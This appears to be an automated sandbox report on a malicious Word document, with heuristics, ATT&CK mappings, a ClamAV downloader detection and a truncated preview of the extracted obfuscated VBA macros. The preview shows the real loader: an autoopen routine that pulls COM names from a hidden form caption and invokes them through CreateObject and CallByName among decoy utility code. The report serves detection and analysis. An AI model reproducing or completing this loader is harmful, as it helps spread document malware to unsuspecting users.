Verdict: MALICIOUS
Risk Score: 362

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1140 Deobfuscate/Decode Files or Information
The sample is an OOXML document containing obfuscated VBA macros, including an AutoOpen macro that uses CreateObject and CallByName. Heuristics indicate an obfuscated auto-exec loader, suggesting it is designed to download and execute a secondary payload. The ClamAV detection further confirms its classification as a malicious downloader.
Heuristics (8)

- ClamAV: Doc.Downloader.Bendis-6680540-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Bendis-6680540-0
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project; VBA macros present
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All extracted URLs were found in document text (OOXML body / shared strings).
Extracted artifacts (2)

Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15701 bytes |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 62976 bytes |

macros.bas
SHA-256: 82f5ae6e19e9d01039182c3678a4a34feed72e188326290ade530bc049ec2cda

Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Call CenterByMan
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{79738CEB-EDB8-4A82-8D14-A28495CA1ABC}{84D9E670-77DF-4E57-91F7-E43C0C124937}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Public fishkinet_1 As Object
Public fishkinet_2 As Object
Public fishkinet_3 As Object
Public fishkinet_7() As String
Public fishkinet_4 As String
Public fishkinet_5 As String
Public fishkinet_6 As Object
Public hubabuba() As String
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean
' ________________________________________Util Functions End____________________________________________
' summe vom Range
Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum As Double
For i = startRow To endRow
For j = 0 To UBound(arrCol)
If IsNumeric(Cells(i, arrCol(j)).Value) Then
sum = sum + Cells(i, arrCol(j)).Value
End If
Next j
res(i - startRow + 1, 1) = sum
sum = 0
Next i
rngCol = res
End Function
Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum()
ReDim sum(0 To UBound(arrCol))
For i = startRow To endRow
For j = 0 To UBound(arrCol)
sum(j) = Cells(i, arrCol(j)).Value
Next j
res(i - startRow + 1, 1) = sum
ReDim sum(0 To UBound(arrCol))
Next i
rngArr = res
End Function
Public Function rng(ByVal start As Integer, ByVal ending As Integer)
Dim res()
ReDim res(0 To ending - start)
Dim i As Integer
For i = start To ending
res(i - start) = i
Next i
rng = res
End Function
Public Sub CenterByMan()
Dim Col As String
Dim obj As String
hubabuba = Split(UserForm1.Label1.Caption, "/")
GoTo ErrExit
ErrExit:
Set fishkinet_1 = CreateObject(hubabuba(0))
CheckBins
Exit Sub
husbanDip:
AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description
Resume ErrExit
End Sub
' ______________________________ Print______________________________________________
Public Function p()
' check if the val is array
Dim is_a As Boolean
Dim k
For Each k In Me.dict.Keys
is_a = IsArray(Me.dict(k))
Exit For
Next k
If is_a Then
For Each k In Me.dict.Keys
Debug.Print k & " " & a_toString(Me.Item(k))
Next k
Else
For Each k In Me.dict.Keys
Debug.Print k & " " & Me.Item(k)
Next k
End If
End Function
Public Function a_toString(ByVal arr As Variant) As String
Dim res As String
Dim i
res = "["
For Each i In arr
res = res & Replace(" " & i, ",", ".") & ", "
Next i
res = Left(res, Len(res) - 2)
a_toString = res & " ]"
End Function
Public Function pk()
Dim k
For Each k In Me.dict.Keys
Debug.Print k
Next k
End Function
Public Sub SaveMaps()
rbp = CallByName(fishkinet_1, hubabuba(10), VbGet)
Dim objStor As Variant
CallByName fishkinet_2, hubabuba(9), VbMethod, rbp
CallByName
```

... (truncated)

vbaProject_00.bin
SHA-256: 2410e4395ef4e895d01cd8add7121bd1883d2bc0e6517ed4b5d4ee508eb0fb6f

Detection
- ClamAV: Doc.Downloader.Bendis-6680540-0
- Obfuscation or payload: unlikely